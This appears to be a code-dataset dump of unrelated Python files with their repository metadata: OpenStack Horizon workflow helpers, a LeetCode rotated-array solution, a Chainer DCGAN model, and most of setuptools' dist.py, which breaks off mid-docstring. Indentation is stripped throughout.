from django.utils.translation import ugettext_lazy as _
from horizon import forms
from horizon import workflows
from openstack_dashboard.api import network
LOG = logging.getLogger(__name__)
class Parameter(object):
def __init__(self, config):
self.name = config['name']
self.description = config.get('description', "No description")
self.required = not config['is_optional']
self.default_value = config.get('default_value', None)
self.initial_value = self.default_value
self.param_type = config['config_type']
self.priority = int(config.get('priority', 2))
self.choices = config.get('config_values', None)
def build_control(parameter):
attrs = {"priority": parameter.priority,
"placeholder": parameter.default_value}
if parameter.param_type == "string":
return forms.CharField(
widget=forms.TextInput(attrs=attrs),
label=parameter.name,
required=(parameter.required and
parameter.default_value is None),
help_text=parameter.description,
initial=parameter.initial_value)
if parameter.param_type == "int":
return forms.IntegerField(
widget=forms.TextInput(attrs=attrs),
label=parameter.name,
required=parameter.required,
help_text=parameter.description,
initial=parameter.initial_value)
elif parameter.param_type == "bool":
return forms.BooleanField(
widget=forms.CheckboxInput(attrs=attrs),
label=parameter.name,
required=False,
initial=parameter.initial_value,
help_text=parameter.description)
elif parameter.param_type == "dropdown":
return forms.ChoiceField(
widget=forms.Select(attrs=attrs),
label=parameter.name,
required=parameter.required,
choices=parameter.choices,
help_text=parameter.description)
def _create_step_action(name, title, parameters, advanced_fields=None,
service=None):
class_fields = {}
contributes_field = ()
for param in parameters:
field_name = "CONF:" + service + ":" + param.name
contributes_field += (field_name,)
class_fields[field_name] = build_control(param)
if advanced_fields is not None:
for ad_field_name, ad_field_value in advanced_fields:
class_fields[ad_field_name] = ad_field_value
action_meta = type('Meta', (object, ),
dict(help_text_template=("project"
"/data_processing."
"nodegroup_templates/"
"_fields_help.html")))
class_fields['Meta'] = action_meta
action = type(str(title),
(workflows.Action,),
class_fields)
step_meta = type('Meta', (object,), dict(name=title))
step = type(str(name),
(workflows.Step, ),
dict(name=name,
process_name=name,
action_class=action,
contributes=contributes_field,
Meta=step_meta))
return step
def build_node_group_fields(action, name, template, count, serialized=None):
action.fields[name] = forms.CharField(
label=_("Name"),
widget=forms.TextInput())
action.fields[template] = forms.CharField(
label=_("Node group cluster"),
widget=forms.HiddenInput())
action.fields[count] = forms.IntegerField(
label=_("Count"),
min_value=0,
widget=forms.HiddenInput())
action.fields[serialized] = forms.CharField(
widget=forms.HiddenInput())
def parse_configs_from_context(context, defaults):
configs_dict = dict()
for key, val in context.items():
if str(key).startswith("CONF"):
key_split = str(key).split(":")
service = key_split[1]
config = key_split[2]
if service not in configs_dict:
configs_dict[service] = dict()
if (val is None or
unicode(defaults[service][config]) == unicode(val)):
continue
configs_dict[service][config] = val
return configs_dict
def get_security_groups(request, security_group_ids):
security_groups = []
for group in security_group_ids or []:
try:
security_groups.append(network.security_group_get(
request, group))
except Exception:
LOG.info(_('Unable to retrieve security group %(group)s.') %
{'group': group})
security_groups.append({'name': group})
return security_groups
def get_plugin_and_hadoop_version(request):
plugin_name = None
hadoop_version = None
if request.REQUEST.get("plugin_name"):
plugin_name = request.REQUEST["plugin_name"]
hadoop_version = request.REQUEST["hadoop_version"]
return (plugin_name, hadoop_version)
def clean_node_group(node_group):
node_group_copy = dict((key, value)
for key, value in node_group.items() if value)
for key in ["id", "created_at", "updated_at"]:
if key in node_group_copy:
node_group_copy.pop(key)
return node_group_copy
class PluginAndVersionMixin(object):
def _generate_plugin_version_fields(self, sahara):
plugins = sahara.plugins.list()
plugin_choices = [(plugin.name, plugin.title) for plugin in plugins]
self.fields["plugin_name"] = forms.ChoiceField(
label=_("Plugin Name"),
choices=plugin_choices,
widget=forms.Select(attrs={"class": "plugin_name_choice"}))
for plugin in plugins:
field_name = plugin.name + "_version"
choice_field = forms.ChoiceField(
label=_("Version"),
choices=[(version, version) for version in plugin.versions],
widget=forms.Select(
attrs={"class": "plugin_version_choice "
+ field_name + "_choice"})
)
self.fields[field_name] = choice_field
class PatchedDynamicWorkflow(workflows.Workflow):
"""Overrides Workflow to fix its issues."""
def _ensure_dynamic_exist(self):
if not hasattr(self, 'dynamic_steps'):
self.dynamic_steps = list()
def _register_step(self, step):
# Use that method instead of 'register' to register step.
# Note that a step could be registered in descendant class constructor
# only before this class constructor is invoked.
self._ensure_dynamic_exist()
self.dynamic_steps.append(step)
def _order_steps(self):
# overrides method of Workflow
# crutch to fix https://bugs.launchpad.net/horizon/+bug/1196717
# and another not filed issue that dynamic creation of tabs is
# not thread safe
self._ensure_dynamic_exist()
self._registry = dict([(step, step(self))
for step in self.dynamic_steps])
return list(self.default_steps) + self.dynamic_steps
class ServiceParametersWorkflow(PatchedDynamicWorkflow):
"""Base class for Workflows having services tabs with parameters."""
def _populate_tabs(self, general_parameters, service_parameters):
# Populates tabs for 'general' and service parameters
# Also populates defaults and initial values
self.defaults = dict()
self._init_step('general', 'General Parameters', general_parameters)
for service, parameters in service_parameters.items():
self._init_step(service, service + ' Parameters', parameters)
def _init_step(self, service, title, parameters):
if not parameters:
return
self._populate_initial_values(service, parameters)
step = _create_step_action(service, title=title, parameters=parameters,
service=service)
self.defaults[service] = dict()
for param in parameters:
self.defaults[service][param.name] = param.default_value
self._register_step(step)
def _set_configs_to_copy(self, configs):
self.configs_to_copy = configs
def _populate_initial_values(self, service, parameters):
if not hasattr(self, 'configs_to_copy'):
return
configs = self.configs_to_copy
for param in parameters:
if (service in configs and
param.name in configs[service]):
param.initial_value = configs[service][param.name]
class StatusFormatMixin(workflows.Workflow):
def __init__(self, request, context_seed, entry_point, *args, **kwargs):
super(StatusFormatMixin, self).__init__(request,
context_seed,
entry_point,
*args,
**kwargs)
def format_status_message(self, message):
error_description = getattr(self, 'error_description', None)
if error_description:
return error_description
else:
return message % self.context[self.name_property]
|
apache-2.0
|
kingsamchen/Eureka
|
crack-data-structures-and-algorithms/leetcode/find_minimum_in_rotated_sorted_array_II_q154.py
|
1
|
1154
|
# -*- coding: utf-8 -*-
# 0xCCCCCCCC
# Like Q153 but with possible duplicates.
def find_min(nums):
"""
:type nums: List[int]
:rtype: int
"""
l, r = 0, len(nums) - 1
while l < r and nums[l] >= nums[r]:
m = (l + r) // 2
if nums[m] > nums[r]:
l = m + 1
elif nums[m] < nums[r]:
r = m
else:
# When nums[m] == nums[r], we have only few cases.
# Try to prune cases as possible.
if nums[m] < nums[l]:
l += 1
r = m
# nums[l] = nums[m] = nums[r]
# Rules out one of same elements, and properties of array are preserved.
else:
r -= 1
return nums[l]
nums = [4,5,6,7,0,1,2]
print(find_min(nums))
nums = [3,4,5,1,2]
print(find_min(nums))
nums = [5,1,2]
print(find_min(nums))
nums = [5,2]
print(find_min(nums))
nums = [2,3,4,5,1]
print(find_min(nums))
nums = [1, 3, 5]
print(find_min(nums))
nums = [2,2,2,0,1]
print(find_min(nums))
nums = [3,3,1,3]
print(find_min(nums))
nums = [3,1,3,3,3]
print(find_min(nums))
nums = [4,4,4,4,4,4]
print(find_min(nums))
|
mit
|
delta2323/chainer
|
examples/dcgan/net.py
|
5
|
3623
|
#!/usr/bin/env python
from __future__ import print_function
import numpy
import chainer
from chainer import cuda
import chainer.functions as F
import chainer.links as L
def add_noise(h, sigma=0.2):
xp = cuda.get_array_module(h.data)
if chainer.config.train:
return h + sigma * xp.random.randn(*h.shape)
else:
return h
class Generator(chainer.Chain):
def __init__(self, n_hidden, bottom_width=4, ch=512, wscale=0.02):
super(Generator, self).__init__()
self.n_hidden = n_hidden
self.ch = ch
self.bottom_width = bottom_width
with self.init_scope():
w = chainer.initializers.Normal(wscale)
self.l0 = L.Linear(self.n_hidden, bottom_width * bottom_width * ch,
initialW=w)
self.dc1 = L.Deconvolution2D(ch, ch // 2, 4, 2, 1, initialW=w)
self.dc2 = L.Deconvolution2D(ch // 2, ch // 4, 4, 2, 1, initialW=w)
self.dc3 = L.Deconvolution2D(ch // 4, ch // 8, 4, 2, 1, initialW=w)
self.dc4 = L.Deconvolution2D(ch // 8, 3, 3, 1, 1, initialW=w)
self.bn0 = L.BatchNormalization(bottom_width * bottom_width * ch)
self.bn1 = L.BatchNormalization(ch // 2)
self.bn2 = L.BatchNormalization(ch // 4)
self.bn3 = L.BatchNormalization(ch // 8)
def make_hidden(self, batchsize):
return numpy.random.uniform(-1, 1, (batchsize, self.n_hidden, 1, 1))\
.astype(numpy.float32)
def __call__(self, z):
h = F.reshape(F.relu(self.bn0(self.l0(z))),
(len(z), self.ch, self.bottom_width, self.bottom_width))
h = F.relu(self.bn1(self.dc1(h)))
h = F.relu(self.bn2(self.dc2(h)))
h = F.relu(self.bn3(self.dc3(h)))
x = F.sigmoid(self.dc4(h))
return x
class Discriminator(chainer.Chain):
def __init__(self, bottom_width=4, ch=512, wscale=0.02):
w = chainer.initializers.Normal(wscale)
super(Discriminator, self).__init__()
with self.init_scope():
self.c0_0 = L.Convolution2D(3, ch // 8, 3, 1, 1, initialW=w)
self.c0_1 = L.Convolution2D(ch // 8, ch // 4, 4, 2, 1, initialW=w)
self.c1_0 = L.Convolution2D(ch // 4, ch // 4, 3, 1, 1, initialW=w)
self.c1_1 = L.Convolution2D(ch // 4, ch // 2, 4, 2, 1, initialW=w)
self.c2_0 = L.Convolution2D(ch // 2, ch // 2, 3, 1, 1, initialW=w)
self.c2_1 = L.Convolution2D(ch // 2, ch // 1, 4, 2, 1, initialW=w)
self.c3_0 = L.Convolution2D(ch // 1, ch // 1, 3, 1, 1, initialW=w)
self.l4 = L.Linear(bottom_width * bottom_width * ch, 1, initialW=w)
self.bn0_1 = L.BatchNormalization(ch // 4, use_gamma=False)
self.bn1_0 = L.BatchNormalization(ch // 4, use_gamma=False)
self.bn1_1 = L.BatchNormalization(ch // 2, use_gamma=False)
self.bn2_0 = L.BatchNormalization(ch // 2, use_gamma=False)
self.bn2_1 = L.BatchNormalization(ch // 1, use_gamma=False)
self.bn3_0 = L.BatchNormalization(ch // 1, use_gamma=False)
def __call__(self, x):
h = add_noise(x)
h = F.leaky_relu(add_noise(self.c0_0(h)))
h = F.leaky_relu(add_noise(self.bn0_1(self.c0_1(h))))
h = F.leaky_relu(add_noise(self.bn1_0(self.c1_0(h))))
h = F.leaky_relu(add_noise(self.bn1_1(self.c1_1(h))))
h = F.leaky_relu(add_noise(self.bn2_0(self.c2_0(h))))
h = F.leaky_relu(add_noise(self.bn2_1(self.c2_1(h))))
h = F.leaky_relu(add_noise(self.bn3_0(self.c3_0(h))))
return self.l4(h)
|
mit
|
rossgoodwin/musapaedia
|
musapaedia/muse/lib/python2.7/site-packages/setuptools/dist.py
|
16
|
35330
|
__all__ = ['Distribution']
import re
import os
import sys
import warnings
import numbers
import distutils.log
import distutils.core
import distutils.cmd
import distutils.dist
from distutils.core import Distribution as _Distribution
from distutils.errors import (DistutilsOptionError, DistutilsPlatformError,
DistutilsSetupError)
from setuptools.depends import Require
from setuptools.compat import basestring, PY2
from setuptools import windows_support
import pkg_resources
packaging = pkg_resources.packaging
def _get_unpatched(cls):
"""Protect against re-patching the distutils if reloaded
Also ensures that no other distutils extension monkeypatched the distutils
first.
"""
while cls.__module__.startswith('setuptools'):
cls, = cls.__bases__
if not cls.__module__.startswith('distutils'):
raise AssertionError(
"distutils has already been patched by %r" % cls
)
return cls
_Distribution = _get_unpatched(_Distribution)
def _patch_distribution_metadata_write_pkg_info():
"""
Workaround issue #197 - Python 3 prior to 3.2.2 uses an environment-local
encoding to save the pkg_info. Monkey-patch its write_pkg_info method to
correct this undesirable behavior.
"""
environment_local = (3,) <= sys.version_info[:3] < (3, 2, 2)
if not environment_local:
return
# from Python 3.4
def write_pkg_info(self, base_dir):
"""Write the PKG-INFO file into the release tree.
"""
with open(os.path.join(base_dir, 'PKG-INFO'), 'w',
encoding='UTF-8') as pkg_info:
self.write_pkg_file(pkg_info)
distutils.dist.DistributionMetadata.write_pkg_info = write_pkg_info
_patch_distribution_metadata_write_pkg_info()
sequence = tuple, list
def check_importable(dist, attr, value):
try:
ep = pkg_resources.EntryPoint.parse('x='+value)
assert not ep.extras
except (TypeError,ValueError,AttributeError,AssertionError):
raise DistutilsSetupError(
"%r must be importable 'module:attrs' string (got %r)"
% (attr,value)
)
def assert_string_list(dist, attr, value):
"""Verify that value is a string list or None"""
try:
assert ''.join(value)!=value
except (TypeError,ValueError,AttributeError,AssertionError):
raise DistutilsSetupError(
"%r must be a list of strings (got %r)" % (attr,value)
)
def check_nsp(dist, attr, value):
"""Verify that namespace packages are valid"""
assert_string_list(dist,attr,value)
for nsp in value:
if not dist.has_contents_for(nsp):
raise DistutilsSetupError(
"Distribution contains no modules or packages for " +
"namespace package %r" % nsp
)
if '.' in nsp:
parent = '.'.join(nsp.split('.')[:-1])
if parent not in value:
distutils.log.warn(
"WARNING: %r is declared as a package namespace, but %r"
" is not: please correct this in setup.py", nsp, parent
)
def check_extras(dist, attr, value):
"""Verify that extras_require mapping is valid"""
try:
for k,v in value.items():
if ':' in k:
k,m = k.split(':',1)
if pkg_resources.invalid_marker(m):
raise DistutilsSetupError("Invalid environment marker: "+m)
list(pkg_resources.parse_requirements(v))
except (TypeError,ValueError,AttributeError):
raise DistutilsSetupError(
"'extras_require' must be a dictionary whose values are "
"strings or lists of strings containing valid project/version "
"requirement specifiers."
)
def assert_bool(dist, attr, value):
"""Verify that value is True, False, 0, or 1"""
if bool(value) != value:
raise DistutilsSetupError(
"%r must be a boolean value (got %r)" % (attr,value)
)
def check_requirements(dist, attr, value):
"""Verify that install_requires is a valid requirements list"""
try:
list(pkg_resources.parse_requirements(value))
except (TypeError,ValueError):
raise DistutilsSetupError(
"%r must be a string or list of strings "
"containing valid project/version requirement specifiers" % (attr,)
)
def check_entry_points(dist, attr, value):
"""Verify that entry_points map is parseable"""
try:
pkg_resources.EntryPoint.parse_map(value)
except ValueError:
e = sys.exc_info()[1]
raise DistutilsSetupError(e)
def check_test_suite(dist, attr, value):
if not isinstance(value,basestring):
raise DistutilsSetupError("test_suite must be a string")
def check_package_data(dist, attr, value):
"""Verify that value is a dictionary of package names to glob lists"""
if isinstance(value,dict):
for k,v in value.items():
if not isinstance(k,str): break
try: iter(v)
except TypeError:
break
else:
return
raise DistutilsSetupError(
attr+" must be a dictionary mapping package names to lists of "
"wildcard patterns"
)
def check_packages(dist, attr, value):
for pkgname in value:
if not re.match(r'\w+(\.\w+)*', pkgname):
distutils.log.warn(
"WARNING: %r not a valid package name; please use only"
".-separated package names in setup.py", pkgname
)
class Distribution(_Distribution):
"""Distribution with support for features, tests, and package data
This is an enhanced version of 'distutils.dist.Distribution' that
effectively adds the following new optional keyword arguments to 'setup()':
'install_requires' -- a string or sequence of strings specifying project
versions that the distribution requires when installed, in the format
used by 'pkg_resources.require()'. They will be installed
automatically when the package is installed. If you wish to use
packages that are not available in PyPI, or want to give your users an
alternate download location, you can add a 'find_links' option to the
'[easy_install]' section of your project's 'setup.cfg' file, and then
setuptools will scan the listed web pages for links that satisfy the
requirements.
'extras_require' -- a dictionary mapping names of optional "extras" to the
additional requirement(s) that using those extras incurs. For example,
this::
extras_require = dict(reST = ["docutils>=0.3", "reSTedit"])
indicates that the distribution can optionally provide an extra
capability called "reST", but it can only be used if docutils and
reSTedit are installed. If the user installs your package using
EasyInstall and requests one of your extras, the corresponding
additional requirements will be installed if needed.
'features' **deprecated** -- a dictionary mapping option names to
'setuptools.Feature'
objects. Features are a portion of the distribution that can be
included or excluded based on user options, inter-feature dependencies,
and availability on the current system. Excluded features are omitted
from all setup commands, including source and binary distributions, so
you can create multiple distributions from the same source tree.
Feature names should be valid Python identifiers, except that they may
contain the '-' (minus) sign. Features can be included or excluded
via the command line options '--with-X' and '--without-X', where 'X' is
the name of the feature. Whether a feature is included by default, and
whether you are allowed to control this from the command line, is
determined by the Feature object. See the 'Feature' class for more
information.
'test_suite' -- the name of a test suite to run for the 'test' command.
If the user runs 'python setup.py test', the package will be installed,
and the named test suite will be run. The format is the same as
would be used on a 'unittest.py' command line. That is, it is the
dotted name of an object to import and call to generate a test suite.
'package_data' -- a dictionary mapping package names to lists of filenames
or globs to use to find data files contained in the named packages.
If the dictionary has filenames or globs listed under '""' (the empty
string), those names will be searched for in every package, in addition
to any names for the specific package. Data files found using these
names/globs will be installed along with the package, in the same
location as the package. Note that globs are allowed to reference
the contents of non-package subdirectories, as long as you use '/' as
a path separator. (Globs are automatically converted to
platform-specific paths at runtime.)
In addition to these new keywords, this class also has several new methods
for manipulating the distribution's contents. For example, the 'include()'
and 'exclude()' methods can be thought of as in-place add and subtract
commands that add or remove packages, modules, extensions, and so on from
the distribution. They are used by the feature subsystem to configure the
distribution for the included and excluded features.
"""
_patched_dist = None
def patch_missing_pkg_info(self, attrs):
# Fake up a replacement for the data that would normally come from
# PKG-INFO, but which might not yet be built if this is a fresh
# checkout.
#
if not attrs or 'name' not in attrs or 'version' not in attrs:
return
key = pkg_resources.safe_name(str(attrs['name'])).lower()
dist = pkg_resources.working_set.by_key.get(key)
if dist is not None and not dist.has_metadata('PKG-INFO'):
dist._version = pkg_resources.safe_version(str(attrs['version']))
self._patched_dist = dist
def __init__(self, attrs=None):
have_package_data = hasattr(self, "package_data")
if not have_package_data:
self.package_data = {}
_attrs_dict = attrs or {}
if 'features' in _attrs_dict or 'require_features' in _attrs_dict:
Feature.warn_deprecated()
self.require_features = []
self.features = {}
self.dist_files = []
self.src_root = attrs and attrs.pop("src_root", None)
self.patch_missing_pkg_info(attrs)
# Make sure we have any eggs needed to interpret 'attrs'
if attrs is not None:
self.dependency_links = attrs.pop('dependency_links', [])
assert_string_list(self,'dependency_links',self.dependency_links)
if attrs and 'setup_requires' in attrs:
self.fetch_build_eggs(attrs['setup_requires'])
for ep in pkg_resources.iter_entry_points('distutils.setup_keywords'):
if not hasattr(self,ep.name):
setattr(self,ep.name,None)
_Distribution.__init__(self,attrs)
if isinstance(self.metadata.version, numbers.Number):
# Some people apparently take "version number" too literally :)
self.metadata.version = str(self.metadata.version)
if self.metadata.version is not None:
try:
ver = packaging.version.Version(self.metadata.version)
normalized_version = str(ver)
if self.metadata.version != normalized_version:
warnings.warn(
"The version specified requires normalization, "
"consider using '%s' instead of '%s'." % (
normalized_version,
self.metadata.version,
)
)
self.metadata.version = normalized_version
except (packaging.version.InvalidVersion, TypeError):
warnings.warn(
"The version specified (%r) is an invalid version, this "
"may not work as expected with newer versions of "
"setuptools, pip, and PyPI. Please see PEP 440 for more "
"details." % self.metadata.version
)
def parse_command_line(self):
"""Process features after parsing command line options"""
result = _Distribution.parse_command_line(self)
if self.features:
self._finalize_features()
return result
def _feature_attrname(self,name):
"""Convert feature name to corresponding option attribute name"""
return 'with_'+name.replace('-','_')
def fetch_build_eggs(self, requires):
"""Resolve pre-setup requirements"""
resolved_dists = pkg_resources.working_set.resolve(
pkg_resources.parse_requirements(requires),
installer=self.fetch_build_egg,
replace_conflicting=True,
)
for dist in resolved_dists:
pkg_resources.working_set.add(dist, replace=True)
def finalize_options(self):
_Distribution.finalize_options(self)
if self.features:
self._set_global_opts_from_features()
for ep in pkg_resources.iter_entry_points('distutils.setup_keywords'):
value = getattr(self,ep.name,None)
if value is not None:
ep.require(installer=self.fetch_build_egg)
ep.load()(self, ep.name, value)
if getattr(self, 'convert_2to3_doctests', None):
# XXX may convert to set here when we can rely on set being builtin
self.convert_2to3_doctests = [os.path.abspath(p) for p in self.convert_2to3_doctests]
else:
self.convert_2to3_doctests = []
def get_egg_cache_dir(self):
egg_cache_dir = os.path.join(os.curdir, '.eggs')
if not os.path.exists(egg_cache_dir):
os.mkdir(egg_cache_dir)
windows_support.hide_file(egg_cache_dir)
readme_txt_filename = os.path.join(egg_cache_dir, 'README.txt')
with open(readme_txt_filename, 'w') as f:
f.write('This directory contains eggs that were downloaded '
'by setuptools to build, test, and run plug-ins.\n\n')
f.write('This directory caches those eggs to prevent '
'repeated downloads.\n\n')
f.write('However, it is safe to delete this directory.\n\n')
return egg_cache_dir
def fetch_build_egg(self, req):
"""Fetch an egg needed for building"""
try:
cmd = self._egg_fetcher
cmd.package_index.to_scan = []
except AttributeError:
from setuptools.command.easy_install import easy_install
dist = self.__class__({'script_args':['easy_install']})
dist.parse_config_files()
opts = dist.get_option_dict('easy_install')
keep = (
'find_links', 'site_dirs', 'index_url', 'optimize',
'site_dirs', 'allow_hosts'
)
for key in list(opts):
if key not in keep:
del opts[key] # don't use any other settings
if self.dependency_links:
links = self.dependency_links[:]
if 'find_links' in opts:
links = opts['find_links'][1].split() + links
opts['find_links'] = ('setup', links)
install_dir = self.get_egg_cache_dir()
cmd = easy_install(
dist, args=["x"], install_dir=install_dir, exclude_scripts=True,
always_copy=False, build_directory=None, editable=False,
upgrade=False, multi_version=True, no_report=True, user=False
)
cmd.ensure_finalized()
self._egg_fetcher = cmd
return cmd.easy_install(req)
def _set_global_opts_from_features(self):
"""Add --with-X/--without-X options based on optional features"""
go = []
no = self.negative_opt.copy()
for name,feature in self.features.items():
self._set_feature(name,None)
feature.validate(self)
if feature.optional:
descr = feature.description
incdef = ' (default)'
excdef=''
if not feature.include_by_default():
excdef, incdef = incdef, excdef
go.append(('with-'+name, None, 'include '+descr+incdef))
go.append(('without-'+name, None, 'exclude '+descr+excdef))
no['without-'+name] = 'with-'+name
self.global_options = self.feature_options = go + self.global_options
self.negative_opt = self.feature_negopt = no
def _finalize_features(self):
"""Add/remove features and resolve dependencies between them"""
# First, flag all the enabled items (and thus their dependencies)
for name,feature in self.features.items():
enabled = self.feature_is_included(name)
if enabled or (enabled is None and feature.include_by_default()):
feature.include_in(self)
self._set_feature(name,1)
# Then disable the rest, so that off-by-default features don't
# get flagged as errors when they're required by an enabled feature
for name,feature in self.features.items():
if not self.feature_is_included(name):
feature.exclude_from(self)
self._set_feature(name,0)
def get_command_class(self, command):
"""Pluggable version of get_command_class()"""
if command in self.cmdclass:
return self.cmdclass[command]
for ep in pkg_resources.iter_entry_points('distutils.commands',command):
ep.require(installer=self.fetch_build_egg)
self.cmdclass[command] = cmdclass = ep.load()
return cmdclass
else:
return _Distribution.get_command_class(self, command)
def print_commands(self):
for ep in pkg_resources.iter_entry_points('distutils.commands'):
if ep.name not in self.cmdclass:
# don't require extras as the commands won't be invoked
cmdclass = ep._load()
self.cmdclass[ep.name] = cmdclass
return _Distribution.print_commands(self)
def _set_feature(self,name,status):
"""Set feature's inclusion status"""
setattr(self,self._feature_attrname(name),status)
def feature_is_included(self,name):
"""Return 1 if feature is included, 0 if excluded, 'None' if unknown"""
return getattr(self,self._feature_attrname(name))
def include_feature(self,name):
"""Request inclusion of feature named 'name'"""
if self.feature_is_included(name)==0:
descr = self.features[name].description
raise DistutilsOptionError(
descr + " is required, but was excluded or is not available"
)
self.features[name].include_in(self)
self._set_feature(name,1)
def include(self,**attrs):
"""Add items to distribution that are named in keyword arguments
For example, 'dist.exclude(py_modules=["x"])' would add 'x' to
the distribution's 'py_modules' attribute, if it was not already
there.
Currently, this method only supports inclusion for attributes that are
lists or tuples. If you need to add support for adding to other
attributes in this or a subclass, you can add an '_include_X' method,
where 'X' is the name of the attribute. The method will be called with
the value passed to 'include()'. So, 'dist.include(foo={"bar":"baz"})'
will try to call 'dist._include_foo({"bar":"baz"})', which can then
handle whatever special inclusion logic is needed.
"""
for k,v in attrs.items():
include = getattr(self, '_include_'+k, None)
if include:
include(v)
else:
self._include_misc(k,v)
def exclude_package(self,package):
"""Remove packages, modules, and extensions in named package"""
pfx = package+'.'
if self.packages:
self.packages = [
p for p in self.packages
if p != package and not p.startswith(pfx)
]
if self.py_modules:
self.py_modules = [
p for p in self.py_modules
if p != package and not p.startswith(pfx)
]
if self.ext_modules:
self.ext_modules = [
p for p in self.ext_modules
if p.name != package and not p.name.startswith(pfx)
]
def has_contents_for(self,package):
"""Return true if 'exclude_package(package)' would do something"""
pfx = package+'.'
for p in self.iter_distribution_names():
if p==package or p.startswith(pfx):
return True
def _exclude_misc(self,name,value):
"""Handle 'exclude()' for list/tuple attrs without a special handler"""
if not isinstance(value,sequence):
raise DistutilsSetupError(
"%s: setting must be a list or tuple (%r)" % (name, value)
)
try:
old = getattr(self,name)
except AttributeError:
raise DistutilsSetupError(
"%s: No such distribution setting" % name
)
if old is not None and not isinstance(old,sequence):
raise DistutilsSetupError(
name+": this setting cannot be changed via include/exclude"
)
elif old:
setattr(self,name,[item for item in old if item not in value])
def _include_misc(self,name,value):
"""Handle 'include()' for list/tuple attrs without a special handler"""
if not isinstance(value,sequence):
raise DistutilsSetupError(
"%s: setting must be a list (%r)" % (name, value)
)
try:
old = getattr(self,name)
except AttributeError:
raise DistutilsSetupError(
"%s: No such distribution setting" % name
)
if old is None:
setattr(self,name,value)
elif not isinstance(old,sequence):
raise DistutilsSetupError(
name+": this setting cannot be changed via include/exclude"
)
else:
setattr(self,name,old+[item for item in value if item not in old])
def exclude(self,**attrs):
"""Remove items from distribution that are named in keyword arguments
For example, 'dist.exclude(py_modules=["x"])' would remove 'x' from
the distribution's 'py_modules' attribute. Excluding packages uses
the 'exclude_package()' method, so all of the package's contained
packages, modules, and extensions are also excluded.
Currently, this method only supports exclusion from attributes that are
lists or tuples. If you need to add support for excluding from other
attributes in this or a subclass, you can add an '_exclude_X' method,
where 'X' is the name of the attribute. The method will be called with
the value passed to 'exclude()'. So, 'dist.exclude(foo={"bar":"baz"})'
will try to call 'dist._exclude_foo({"bar":"baz"})', which can then
handle whatever special exclusion logic is needed.
"""
for k,v in attrs.items():
exclude = getattr(self, '_exclude_'+k, None)
if exclude:
exclude(v)
else:
self._exclude_misc(k,v)
def _exclude_packages(self,packages):
if not isinstance(packages,sequence):
raise DistutilsSetupError(
"packages: setting must be a list or tuple (%r)" % (packages,)
)
list(map(self.exclude_package, packages))
def _parse_command_opts(self, parser, args):
# Remove --with-X/--without-X options when processing command args
self.global_options = self.__class__.global_options
self.negative_opt = self.__class__.negative_opt
# First, expand any aliases
command = args[0]
aliases = self.get_option_dict('aliases')
while command in aliases:
src,alias = aliases[command]
del aliases[command] # ensure each alias can expand only once!
import shlex
args[:1] = shlex.split(alias,True)
command = args[0]
nargs = _Distribution._parse_command_opts(self, parser, args)
# Handle commands that want to consume all remaining arguments
cmd_class = self.get_command_class(command)
if getattr(cmd_class,'command_consumes_arguments',None):
self.get_option_dict(command)['args'] = ("command line", nargs)
if nargs is not None:
return []
return nargs
def get_cmdline_options(self):
"""Return a '{cmd: {opt:val}}' map of all command-line options
Option names are all long, but do not include the leading '--', and
contain dashes rather than underscores. If the option doesn't take
an argument (e.g. '--quiet'), the 'val' is 'None'.
Note that options provided by config files are intentionally excluded.
"""
d = {}
for cmd,opts in self.command_options.items():
for opt,(src,val) in opts.items():
if src != "command line":
continue
opt = opt.replace('_','-')
if val==0:
cmdobj = self.get_command_obj(cmd)
neg_opt = self.negative_opt.copy()
neg_opt.update(getattr(cmdobj,'negative_opt',{}))
for neg,pos in neg_opt.items():
if pos==opt:
opt=neg
val=None
break
else:
raise AssertionError("Shouldn't be able to get here")
elif val==1:
val = None
d.setdefault(cmd,{})[opt] = val
return d
def iter_distribution_names(self):
"""Yield all packages, modules, and extension names in distribution"""
for pkg in self.packages or ():
yield pkg
for module in self.py_modules or ():
yield module
for ext in self.ext_modules or ():
if isinstance(ext,tuple):
name, buildinfo = ext
else:
name = ext.name
if name.endswith('module'):
name = name[:-6]
yield name
def handle_display_options(self, option_order):
"""If there were any non-global "display-only" options
(--help-commands or the metadata display options) on the command
line, display the requested info and return true; else return
false.
"""
import sys
if PY2 or self.help_commands:
return _Distribution.handle_display_options(self, option_order)
# Stdout may be StringIO (e.g. in tests)
import io
if not isinstance(sys.stdout, io.TextIOWrapper):
return _Distribution.handle_display_options(self, option_order)
# Don't wrap stdout if utf-8 is already the encoding. Provides
# workaround for #334.
if sys.stdout.encoding.lower() in ('utf-8', 'utf8'):
return _Distribution.handle_display_options(self, option_order)
# Print metadata in UTF-8 no matter the platform
encoding = sys.stdout.encoding
errors = sys.stdout.errors
newline = sys.platform != 'win32' and '\n' or None
line_buffering = sys.stdout.line_buffering
sys.stdout = io.TextIOWrapper(
sys.stdout.detach(), 'utf-8', errors, newline, line_buffering)
try:
return _Distribution.handle_display_options(self, option_order)
finally:
sys.stdout = io.TextIOWrapper(
sys.stdout.detach(), encoding, errors, newline, line_buffering)
# Install it throughout the distutils
for module in distutils.dist, distutils.core, distutils.cmd:
module.Distribution = Distribution
class Feature:
"""
**deprecated** -- The `Feature` facility was never completely implemented
or supported, `has reported issues
<https://bitbucket.org/pypa/setuptools/issue/58>`_ and will be removed in
a future version.
A subset of the distribution that can be excluded if unneeded/wanted
Features are created using these keyword arguments:
'description' -- a short, human readable description of the feature, to
be used in error messages, and option help messages.
'standard' -- if true, the feature is included by default if it is
available on the current system. Otherwise, the feature is only
included if requested via a command line '--with-X' option, or if
another included feature requires it. The default setting is 'False'.
'available' -- if true, the feature is available for installation on the
current system. The default setting is 'True'.
'optional' -- if true, the feature's inclusion can be controlled from the
command line, using the '--with-X' or '--without-X' options. If
false, the feature's inclusion status is determined automatically,
based on 'availabile', 'standard', and whether any other feature
requires it. The default setting is 'True'.
'require_features' -- a string or sequence of strings naming features
that should also be included if this feature is included. Defaults to
empty list. May also contain 'Require' objects that should be
added/removed from the distribution.
'remove' -- a string or list of strings naming packages to be removed
from the distribution if this feature is *not* included. If the
feature *is* included, this argument is ignored. This argument exists
to support removing features that "crosscut" a distribution, such as
defining a 'tests' feature that removes all the 'tests' subpackages
provided by other features. The default for this argument is an empty
list. (Note: the named package(s) or modules must exist in the base
distribution when the 'setup()' function is initially called.)
other keywords -- any other keyword arguments are saved, and passed to
the distribution's 'include()' and 'exclude()' methods when the
feature is included or excluded, respectively. So, for example, you
could pass 'packages=["a","b"]' to cause packages 'a' and 'b' to be
added or removed from the distribution as appropriate.
A feature must include at least one 'requires', 'remove', or other
keyword argument. Otherwise, it can't affect the distribution in any way.
